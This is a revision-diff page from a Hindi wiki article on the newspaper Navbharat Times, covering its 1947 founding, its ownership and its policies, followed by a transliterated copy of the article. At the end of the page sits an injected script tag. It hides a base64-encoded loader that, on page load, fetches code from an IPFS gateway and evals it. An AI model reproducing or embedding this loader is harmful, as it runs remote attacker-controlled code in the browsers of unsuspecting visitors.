Difference between revisions of "नवभारत टाइम्स"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 6: Line 6:
 
इस समाचार पत्र का स्वामित्व डालमिया के प्रसिद्ध औद्योगिक परिवार के पास था जिसे बाद में [[उत्तर प्रदेश]] के [[बिजनौर]] के 'साहू जैन समूह' के 'साहू शांति प्रसाद जैन' ने इसे नियंत्रण में ले लिया गया।
 
इस समाचार पत्र का स्वामित्व डालमिया के प्रसिद्ध औद्योगिक परिवार के पास था जिसे बाद में [[उत्तर प्रदेश]] के [[बिजनौर]] के 'साहू जैन समूह' के 'साहू शांति प्रसाद जैन' ने इसे नियंत्रण में ले लिया गया।
 
==नीतियाँ==
 
==नीतियाँ==
इंडियाटाइम्स एक सरल विश्वास के साथ स्थापित विश्व स्तरीय मीडिया उत्पाद और सेवाओं के लिए स्थापित किया गया था। हमारा यह विश्वास है कि उपभोक्ता का अनुभव हमारी सफलता के लिए महत्वपूर्ण है। इसकी वजह से यह सफलता है। इसके अलावा 16 विशेष रूचिकर स्तम्भ हैं- फोटोग्राफी से शिक्षा और सुंदरता से फैशन तक को लेकर हम उपभोक्ताओं के समूहों को लक्षित कर रहे हैं।
+
इंडियाटाइम्स एक सरल विश्वास के साथ स्थापित विश्व स्तरीय मीडिया उत्पाद और सेवाओं के लिए स्थापित किया गया था। हमारा यह विश्वास है कि उपभोक्ता का अनुभव हमारी सफलता के लिए महत्त्वपूर्ण है। इसकी वजह से यह सफलता है। इसके अलावा 16 विशेष रूचिकर स्तम्भ हैं- फोटोग्राफी से शिक्षा और सुंदरता से फैशन तक को लेकर हम उपभोक्ताओं के समूहों को लक्षित कर रहे हैं।
  
 
टीम इंडिया टाइम्स प्रतिबद्धता के साथ वैश्विक स्तर पर भारतीयों के साथ कई रिश्ते बनाने के प्रयासरत है। इस कार्य को करने के लिए इंडिया टाइम्स के प्रबंधक और रणनीतिकार विभिन्न कार्यों में संलग्न हैं और निरंतर विचार विमर्श और नीतियाँ बनाते रहते हैं।<ref>{{cite web |url=http://www.epaper.timesofindia.com/Daily/info/aboutus.html|title=About Us |accessmonthday=5 सितम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=अंग्रेज़ी}}</ref>
 
टीम इंडिया टाइम्स प्रतिबद्धता के साथ वैश्विक स्तर पर भारतीयों के साथ कई रिश्ते बनाने के प्रयासरत है। इस कार्य को करने के लिए इंडिया टाइम्स के प्रबंधक और रणनीतिकार विभिन्न कार्यों में संलग्न हैं और निरंतर विचार विमर्श और नीतियाँ बनाते रहते हैं।<ref>{{cite web |url=http://www.epaper.timesofindia.com/Daily/info/aboutus.html|title=About Us |accessmonthday=5 सितम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=अंग्रेज़ी}}</ref>

Revision as of 08:01, 1 August 2013

thumb|pratik chihn, navabharat taims navabharat taims (enabiti) ek dainik samachar patr hai jo dilli aur muanbee se prakashit hota hai. isaki prakashak kanpani benet, kolamain evan kanpani hai, jo 'd taims aauph iandiya', 'd ikan aaumiks taims', 'maharashtr taims' jaise dainik akhabaroan evan 'filmafeyar' v 'phemina' jaisi patrikaoan ka bhi prakashan karati hai. 'navabharat taims' is samooh ke sabase purane prakashanoan mean se ek hai.[1]

pahala aank

navabharat taims ke pahale aank ka prakashan 3 aprail, 1947 mean bharat ki svatantrata se thik pahale hua tha.

svamitv

is samachar patr ka svamitv dalamiya ke prasiddh audyogik parivar ke pas tha jise bad mean uttar pradesh ke bijanaur ke 'sahoo jain samooh' ke 'sahoo shaanti prasad jain' ne ise niyantran mean le liya gaya.

nitiyaan

iandiyataims ek saral vishvas ke sath sthapit vishv stariy midiya utpad aur sevaoan ke lie sthapit kiya gaya tha. hamara yah vishvas hai ki upabhokta ka anubhav hamari saphalata ke lie mahattvapoorn hai. isaki vajah se yah saphalata hai. isake alava 16 vishesh roochikar stambh haian- photographi se shiksha aur suandarata se phaishan tak ko lekar ham upabhoktaoan ke samoohoan ko lakshit kar rahe haian.

tim iandiya taims pratibaddhata ke sath vaishvik star par bharatiyoan ke sath kee rishte banane ke prayasarat hai. is kary ko karane ke lie iandiya taims ke prabandhak aur rananitikar vibhinn karyoan mean sanlagn haian aur nirantar vichar vimarsh aur nitiyaan banate rahate haian.[2]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. The Brand (aangrezi). . abhigaman tithi: 5 sitambar, 2012.
  2. About Us (aangrezi). . abhigaman tithi: 5 sitambar, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>